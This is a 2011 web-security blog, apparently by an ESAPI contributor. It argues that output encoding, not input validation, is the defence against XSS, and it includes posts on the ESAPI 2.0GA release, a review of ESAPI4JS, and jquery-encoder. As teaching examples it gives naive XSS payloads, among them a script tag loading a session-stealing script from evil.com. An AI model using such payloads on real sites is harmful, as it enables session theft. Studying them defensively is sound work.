9.08.2011

XSS - Validation vs. Encoding

I seem to have sparked another one of those lively internet conversations that I tend to spark from time to time. This time, the topic of debate was mitigating XSS. I posted a response to a series of articles I have read lately that either imply or blatantly state that Input Validation is the proper way to mitigate XSS. I wholeheartedly disagree with this assertion.

What is Cross-Site Scripting
Personally, I have always thought this is a horrible name for this vulnerability. The attack is performed by exploiting a vulnerability local to the codebase of the application. The Cross-Site part of XSS is really about the impact of the vulnerability rather than the vulnerability itself. An attacker can leverage weak security on a vulnerable site to include a payload hosted on another site.

That being said, XSS can be defined as a vulnerability that occurs when an attacker is able to break out of a data context and execute arbitrary code using crafted data. More simply put, XSS is nothing more than a buzzword for a specific type of Command Injection vulnerability. Let's examine:

<!-- /search.jsp -->
<div id="my-custom-div">
   Your search for ${request.getParameter("q")} returned '${results.size}' results
</div>

What could go wrong here?

http://my.server.com/search.jsp?q=<script>alert(document.cookie)</script>
http://my.server.com/search.jsp?q=<script src="http://evil.com/steal-session.js"></script>

These are some very naive attacks that can work. Notice that the second example also illustrates the Cross-Site part of the Cross-Site Scripting vulnerability: it is a cross-site payload delivered through a command injection vulnerability. The vulnerability is not the cross-site part of it at all; in fact, the script tag acts exactly as it is specified to.

Data vs Execution Context
This is a subject that has been covered a hundred million times before by people a lot smarter than me, so I will provide a brief summary on what this means in the context of XSS:

Legend: everything labeled "data" is Data; everything else is the Execution Environment.

HTML Context:
<command parameter="data" parameter="data">data</command>

Javascript Context:
command("data");
var var_name="data";

Style Context:
selector {
   attr: data;
   attr: command(data);
}

Highly Diluted Context:
<command style="attr: command(data)" onclick="command('data')" param="data">data</command>

Now that we have that covered, let's move into each exhibit one by one.


Exhibit A: Standard Run-Of-The-Mill XSS
This is your mommy and daddy's XSS vector. The most common type of XSS there is on the web today and coincidentally the easiest to mitigate. This is the Reflective XSS that was not only the grand-daddy of all other XSS vectors but is still the most prevalent type of XSS issue that I find in the wild. This type of XSS is also illustrated perfectly in the above example.

By accepting untrusted input that can be modified by the end-user and rendering that input directly to the view we have created our vulnerability. An attacker can break out of the data context simply by embedding a command in the data being submitted.

While it is possible that a strict alpha-numeric whitelist validation approach could effectively mitigate the illustrated payloads, this is often not acceptable. I used the search results page as an example here for two specific reasons.

1) Search Results Pages are where most of these issues exist.
2) Search Engines have their own parsing engines and data vs. context rules.

If the whitelist is too strict, I won't be able to perform quality searches such as

q=mfg:"Audi"+model:"A4"+year:>2010+price:<25000
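
To make the trade-off concrete, here is a minimal sketch of a strict alpha-numeric whitelist. The pattern and the isValidSearchTerm name are assumptions made up for illustration, not taken from any particular library:

```javascript
// Hypothetical strict whitelist: letters, digits, and spaces only.
const STRICT_WHITELIST = /^[A-Za-z0-9 ]*$/;

function isValidSearchTerm(q) {
  return STRICT_WHITELIST.test(q);
}

const attack = '<script>alert(document.cookie)</script>';
const legitimate = 'mfg:"Audi" model:"A4" year:>2010 price:<25000';

console.log(isValidSearchTerm(attack));     // false: the payload is rejected
console.log(isValidSearchTerm(legitimate)); // false: so is the real search
console.log(isValidSearchTerm('Audi A4'));  // true: only trivial searches pass
```

The same rule that stops the payload also stops the legitimate query.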


Validation alone simply doesn't work in this case. Yes, input validation should still happen here prior to forwarding this untrusted data to a back-end service such as Solr; however, when rendering on the view you want the data to be encoded for the correct context:

<!-- /search.jsp -->
<div id="my-custom-div">
   Your search for ${encodeForHTML(request.getParameter("q"))} returned '${results.size}' results
</div>
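
What an HTML-context encoder does can be sketched in a few lines of Javascript. This is only an illustration under my own assumptions: the encodeForHTML function below is a hypothetical stand-in, not the ESAPI implementation, and it covers only the handful of characters that matter in an HTML body context.

```javascript
// Hypothetical helper for illustration only; not the ESAPI implementation.
// Maps the characters that are significant in an HTML body context to entities.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
  '/': '&#x2F;'
};

function encodeForHTML(untrusted) {
  return String(untrusted).replace(/[&<>"'\/]/g, (ch) => HTML_ENTITIES[ch]);
}

const payload = '<script>alert(document.cookie)</script>';
console.log(encodeForHTML(payload));
```

The encoded payload no longer contains a tag, so the browser treats it as data rather than as a command.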

When the untrusted data gets rendered now, it becomes:

"Your search for mfg:"Audi" model:"A4" year:&gt;2010 price:&lt;25000"

Additionally, an attempted attack from above becomes:

"Your search for &lt;script&gt;alert(document.cookie);&lt;/script&gt;"


Exhibit B: Persistent XSS
Persistent XSS really isn't any different from reflective XSS when it comes to mitigation. The primary difference is that reflective XSS relies on crafting links or otherwise tricking a victim into submitting the payload to the application, whereas persistent XSS has no such limitation. A victim only needs to visit a page that has previously been exploited, and the application delivers the payload to the victim without any additional interaction from the attacker. This is an important distinction in the way the attacks are executed; however, they are mitigated the same way: by using Output Encoding.

Exhibit C: DOM-Based XSS
DOM Based XSS is a really interesting vector from both the attack and mitigation perspectives. What makes DOM Based XSS so unique is that it all happens in the browser. The details of what DOM-XSS actually is are discussed ad nauseam here and here, so I will refrain from trying to explain them in this post. But if you examine the DOM-XSS Prevention Cheatsheet (which I contributed to at the OWASP Summit 2011 in Lisbon), you will see that once again Output Encoding is the clear answer to solving this problem. The difference is that when dealing with DOM-XSS you are encoding with Javascript as opposed to using Server-Side encoding.
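
As a rough sketch of encoding on the client, assume a page that greets the user with whatever appears in the URL fragment. The renderGreeting function, the stand-in element object, and the compact encodeForHTML helper are all hypothetical names chosen for this example; in a real page the element would be a DOM node.

```javascript
// Hypothetical compact HTML encoder; a real application would use a vetted library.
function encodeForHTML(untrusted) {
  return String(untrusted).replace(/[&<>"'\/]/g, (ch) => '&#x' + ch.charCodeAt(0).toString(16) + ';');
}

// Reads untrusted data from the URL fragment and encodes it in the browser
// before it reaches an HTML sink such as innerHTML.
function renderGreeting(element, pageUrl) {
  // Note: decodeURIComponent throws on malformed escapes; not handled in this sketch.
  const raw = decodeURIComponent(new URL(pageUrl).hash.slice(1));
  element.innerHTML = 'Hello, ' + encodeForHTML(raw);
}

// A plain object stands in for a DOM element so the sketch runs outside a browser.
const fakeElement = { innerHTML: '' };
renderGreeting(fakeElement, 'http://my.server.com/welcome.html#<img src=x onerror=alert(1)>');
console.log(fakeElement.innerHTML);
```

The server never sees the fragment, which is why the encoding has to happen in Javascript.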

Exhibit D: Edge Cases and Uncommon Vectors
In the conversation, a couple of edge cases were brought up. The first one dealt with File Uploads. I have to assume that the vector in question was related to this Ha.ckers.org post. If that is indeed the case, then there are a few ways to address the problem. Output Encoding will still absolutely solve the issue: because the image filename is rendered to the view and was initially provided by an untrusted source (the end-user), it should be encoded as an HTML attribute value in the src attribute of the img tag. While I would suggest doing that anyhow, the correct mitigation here is to rename the file when writing it to disk rather than using the filename supplied in the post headers.
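
A minimal sketch of the rename approach, assuming a Node.js back end. The storedNameFor function and the content-type table are hypothetical; the point is only that the stored name is generated by the server and the user-supplied filename is never used.

```javascript
const nodeCrypto = require('crypto');

// Hypothetical table: server-validated content type -> safe extension.
const EXTENSION_BY_TYPE = new Map([
  ['image/png', '.png'],
  ['image/jpeg', '.jpg'],
  ['image/gif', '.gif']
]);

// Builds the on-disk name from random bytes; the original filename is ignored.
function storedNameFor(validatedContentType) {
  const extension = EXTENSION_BY_TYPE.get(validatedContentType);
  if (!extension) {
    throw new Error('Unsupported upload type');
  }
  return nodeCrypto.randomBytes(16).toString('hex') + extension;
}

console.log(storedNameFor('image/png'));
```

Because the name consists only of hex digits and a known extension, there is nothing attacker-controlled left to break out of the src attribute.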

The second edge case to be brought up was JSON parsing. This vector is a DOM-XSS vector, but it is really about neither encoding nor validation. The problem occurs when someone uses eval to parse a JSON data payload rather than using the native JSON.parse() function that is supplied in all modern browsers and is back-ported for non-modern browsers.
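
A short sketch of the difference, using the standard JSON.parse. The parseUntrustedJson wrapper and the sample payloads are made up for illustration. A string that eval would happily execute is simply rejected by a real JSON parser:

```javascript
// Hypothetical wrapper: parses text as JSON and never executes it.
function parseUntrustedJson(text) {
  try {
    return { ok: true, value: JSON.parse(text) };
  } catch (err) {
    return { ok: false, error: err.message };
  }
}

const benign = '{"results": 3}';
// eval(hostile) would run this function; JSON.parse only sees invalid JSON.
const hostile = '(function () { globalThis.pwned = true; return {}; })()';

console.log(parseUntrustedJson(benign).value.results); // 3
console.log(parseUntrustedJson(hostile).ok);           // false
console.log(globalThis.pwned);                         // undefined
```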

The final vector that was discussed was untrusted javascript and/or jsonp. Untrusted javascript and jsonp should never be executed in the scope of the document. This is also neither a validation nor an encoding issue, because neither is an XSS issue. These vectors are all about trust, and untrusted code should never be executed in the same scope or context as trusted code. The correct way to mitigate data-theft via untrusted script inclusion or jsonp is to execute that code in a sandbox or closure. In a sandbox or closure you can limit the scope of the execution context using a whitelist approach. Gareth Heyes has created some great sandboxing implementations, available as OWASP Projects, to help combat these attack vectors.

Closing Statements
While I could (and maybe should) go into greater detail in each one of these areas, my main point with this post was to express that while Input Validation is a good idea for many, many reasons, it is not the answer to one of the most prevalent bugs on the interwebz. Output Encoding remains the best practice for mitigating these attacks, and by claiming otherwise we are doing a disservice to developers who really want to write more secure code.

Update 1:
James Jardine has posted an excellent follow-up to this post on his blog over at http://www.jardinesoftware.net/2011/09/09/xss-validation-vs-encoding/

5.11.2011

ESAPI 2.0GA IS RELEASED!

Friends, Romans, Countrymen - Lend me your ears!

It is my pleasure to announce the official release of ESAPI 2.0GA!

This release features some key enhancements over ESAPI 1.4.x including, 
but not limited to:

     * Upgrade baseline to use Java5
     * Completely redesigned and rewritten Encryptor
     * New and Improved Validation and Encoding Methods
     * Complete redesign of the ESAPI Locator and ObjectFactory
     * More unit tests
     * ESAPI Jar is now Signed with an OWASP Code Signing Certificate
     * ESAPI Jar is Sealed
     * And much, much more

We understand that a lot of you have been waiting a very long time for 
this, and so have we! It was important that we take our time with this 
release to make sure we had addressed everything possible prior to it 
going out. Included in that process was:

     * Peer review of the ESAPI Codebase
     * Code and Architecture Review of new Encryption
     * Adding and fixing unit tests
     * Tons of discussion and interaction with the OWASP Community and 
ESAPI Users

Without the feedback from our users, we could have never accomplished 
some of the awesome enhancements that have been made to the library 
since the last major release, so we owe you all a debt of gratitude for 
helping us design and implement controls that will ultimately help you 
write more secure applications.

We are currently in the process of getting a whole new suite of 
documentation, with a focus on integration tasks and actually using 
ESAPI in real applications - look for those documents over the next 
couple of months, as well as a whole new contribs section in our 
repository aimed at providing turnkey components and solutions to some 
of the more commonly encountered integration points for ESAPI.

You can download the full distribution of ESAPI 2.0GA from our home on 
Google Code at:
http://code.google.com/p/owasp-esapi-java/downloads/list

The latest API Docs can always be found at:
http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/index.html

Within the next 24-48 hours the distribution to Maven Central should be 
updated as well and you should be able to start using 2.0GA in your 
Maven projects as soon as that happens. Maven dependency will be:

<dependency>
    <groupId>org.owasp.esapi</groupId>
    <artifactId>esapi</artifactId>
    <version>2.0GA</version>
</dependency>


As always, we would love to hear your feedback on the release and if you 
have any questions at all, you can join the ESAPI-User Mailing List here:
https://lists.owasp.org/mailman/listinfo/esapi-user

Thanks again to the OWASP and ESAPI Community for helping us build and 
release the tools that help make the internet just a little bit more sane!

Sincerely,
The ESAPI Development and Management Teams

P.S. Please forward this along to any colleagues or distribution lists 
that may be interested.

4.18.2011

ESAPI4JS - Very good write-up by Marcus Niemietz

So late last week, I received the final copy of a paper written by Marcus Niemietz that takes a deep dive into the ESAPI4JS Proof of Concept I wrote over a year ago. I was quite surprised, to say the least - and a bit humbled by 20+ pages of text on the project.

It's funny, I was just thinking about digging in my heels this spring and running through this code again - cleaning it up, trimming a bunch of fat - and possibly doing some additional integration into further jQuery plugins. It seems that I am not the only one who has been thinking about this project lately, and that is great news!

First and foremost - I have reposted the entire report (with the author's permission and OWASP's) over on the OWASP Site.

Marcus first spends some time discussing the project and its concept, as well as the ESAPI project as a whole. This lays the groundwork for his paper and is probably stuff that most of you (my readers) already know. He also corrects some mistakes in the installation guide (that will be reflected on the wiki as soon as time allows). In addition, he spends some time discussing the assessment criteria and specifically how they relate to this project.

Once we get past all of that, we get into the real meat of the paper.

Section 3 focuses on improvements that could be made to the project and this is where I would like to spend most of my time in this post.

3.1.x - Retrofitting Security

Marcus calls out a point here that a mature SDL will have isolated the "risks" of the application prior to any development being done. This is generally very true for shops that have an established and mature SDL - but that statement definitely does not apply to the majority of software development shops that are writing applications for the web today. The idea of retrofitting security into an existing application is central to the idea behind ESAPI. It is imperative that developers have the ability to integrate ESAPI controls into existing applications, because there are a lot more insecure existing applications on the internet right now than there are new applications being built. Several large shops have legacy applications that are no longer actively maintained unless there is a problem, some have such massive application portfolios that it isn't realistic to expect rewrites and large redesigns, and the majority of the applications that are live (and vulnerable) on the web today are smaller "Mom and Pop" applications. This is the target market for ESAPI!

3.2.x - Modification of Objects


I heartily agree this is a huge issue - and one that I have passionately spoken out about whenever the opportunity arises. The fact of the matter is that until Javascript accepts the fact that some objects just *need* to be immutable, security will always be just another stepping stone for the attacker to (easily) overcome in the browser. Specifically, Marcus refers to the ability to overwrite objects in the DOM by referencing HTML Elements with the same id in Internet Explorer. While this is indeed a problem, the issue is much larger and depends 100% on the forced implementation of Immutable Objects in ALL browsers as described in the ECMAScript 5 Specification.
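
For readers who have not used the ECMAScript 5 immutability features, here is a small sketch built on the standard Object.freeze. The encoder object and the tryOverwrite function are hypothetical examples, not ESAPI4JS code, and note that Object.freeze is shallow: nested objects would need to be frozen separately.

```javascript
// Hypothetical security control that should not be replaceable at runtime.
const encoder = Object.freeze({
  encodeForHTML(value) {
    return String(value).replace(/</g, '&lt;').replace(/>/g, '&gt;');
  }
});

// Simulates an attacker trying to swap the control for a no-op.
// In strict mode, writing to a frozen object throws a TypeError.
function tryOverwrite(target) {
  'use strict';
  try {
    target.encodeForHTML = (value) => value;
    return false; // overwrite succeeded
  } catch (err) {
    return err instanceof TypeError; // overwrite was blocked
  }
}

console.log(tryOverwrite(encoder));        // true
console.log(Object.isFrozen(encoder));     // true
console.log(encoder.encodeForHTML('<b>')); // &lt;b&gt;
```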

3.3.x - Redundancy


This is a tricky issue in some regards. Most of it is due to the fact that I was simply creating a proof of concept to show that this could be done in Javascript, but I am also a firm believer that all implementations of the ESAPI (regardless of language) should follow a well-defined API specification. Because of this, it is to be expected that there will be some redundancy in some languages: some methods that perhaps just don't make sense in the language (such as the illustrated escape/unescape methods) will be implemented anyhow just to enforce the contract (implied in JS, of course) of the API.

Adding more Validation!


I agree with this to a certain extent. I think that all the suggested validators should be "available", but there is no need for the user registration form on my small used book store to require validation of International Bank Account Numbers; it does, however, make sense to provide ISBN validation. This problem (I believe, anyhow) is addressed very well in the jQuery Plugin architecture, and I would ultimately like to see this same type of architecture implemented in future ESAPI4JS implementations.

Summary


All in all, I think Marcus did a great job researching and presenting his case in this paper, and I highly recommend that everyone give it a read and comment. I look forward to reading your comments and rebuttals - this is how we change the world, people. One small debate at a time. :)

3.07.2011

New Encoding - Property Aware Contextual Encoding

After some conversations over Twitter with the XSS Ninja known as Gareth Heyes, it became clear that escaping needs go even further than just knowing the context itself. Basically, the gist of the conversation was that different escaping rules apply to different CSS properties. For instance, the background-color property accepts hexadecimal color codes (#CCCCCC), rgb color formulas (rgb(100,100,100)), and plain-text well-known color keywords (blue). This is drastically different from what would go into something like the width property, which would simply be a fixed size or percentage. It was at this point that we came to the conclusion that jquery-encoder should use the name of the property being encoded for to determine the correct escaping syntax.

The new API for the property aware encodeForXXX methods follows:

  • encodeForCss(property,data,omitPropertyName)
    Returns the encoded property: value pair, escaped in the context of the passed in property. Banned properties are the behavior family (behavior,-moz-behavior,-ms-behavior) as they are not safe to be set using untrusted data and allow for script injection by definition. Values that contain the expression keyword will also be rejected as unsafe, as this is the equivalent of calling the javascript eval within a style context. If the optional omitPropertyName is true the function will return only the value encoded for the passed in property.
  • encodeForHTMLAttribute(attribute,data,omitAttributeName)
    Returns the encoded attribute="value" pair, escaped in the context of the passed in attribute. Banned attributes are href and src as those should be encoded using the encodeForUrl function. The javascript event hooks on* are also banned as they should be set using the encodeForJavascript function. The style attribute should be set using the encodeForCSS function. If the optional omitAttributeName parameter is true, the function will return only the value encoded for the passed in attribute.

In all cases, the property/attribute names are canonicalized prior to encoding to validate and get the escaping context for that property (or the default if there is no specific context specified).
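
The rules described above can be sketched roughly as follows. This is not the plugin's source: encodeForCssSketch, the per-property character sets, and the trim-and-lowercase "canonicalization" are simplifying assumptions of mine, meant only to show how the property name can select the escaping rules.

```javascript
// Properties that must never be set from untrusted data (from the description above).
const BANNED_PROPERTIES = ['behavior', '-moz-behavior', '-ms-behavior'];

// Hypothetical per-property sets of punctuation that may pass through unescaped.
const IMMUNE_BY_PROPERTY = new Map([
  ['background-color', '#(),'],
  ['width', '%.']
]);

function encodeForCssSketch(property, data, omitPropertyName) {
  // Simplified canonicalization: trim and lowercase only.
  const name = String(property).trim().toLowerCase();
  if (BANNED_PROPERTIES.includes(name)) {
    throw new Error('Banned property: ' + name);
  }
  const value = String(data);
  if (/expression/i.test(value)) {
    throw new Error('Unsafe value: contains expression');
  }
  const immune = IMMUNE_BY_PROPERTY.get(name) || '';
  // Everything that is not alphanumeric or immune becomes a CSS hex escape.
  const encoded = value.replace(/[^A-Za-z0-9]/g, (ch) =>
    immune.includes(ch) ? ch : '\\' + ch.charCodeAt(0).toString(16) + ' ');
  return omitPropertyName ? encoded : name + ': ' + encoded;
}

console.log(encodeForCssSketch('background-color', '#CCCCCC')); // background-color: #CCCCCC
console.log(encodeForCssSketch('width', '50%', true));          // 50%
```

In this sketch, parentheses are allowed for background-color (so rgb(100,100,100) survives) but are escaped for width, where they have no business appearing.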

This was a somewhat difficult decision to make, simply because it is mixing in a bit of validation with the output encoding control - which is not necessarily ideal from a pure design standpoint. I felt however, that this was a necessary evil in order to ensure correct encoding/escaping context and get the most value from the plugin.

Please continue to send me your thoughts and ideas for the plugin - I plan on releasing it to the general public through the jQuery plugin repository within the next couple weeks so any feedback from the community leading up to the release of the plugin will only make it stronger!

As always, the latest version of the plugin is available from my github:
https://github.com/chrisisbeef/jquery-encoder

The sandbox (which will be updated with the latest version today) is available on my site:
http://software.digital-ritual.net/jqencoder/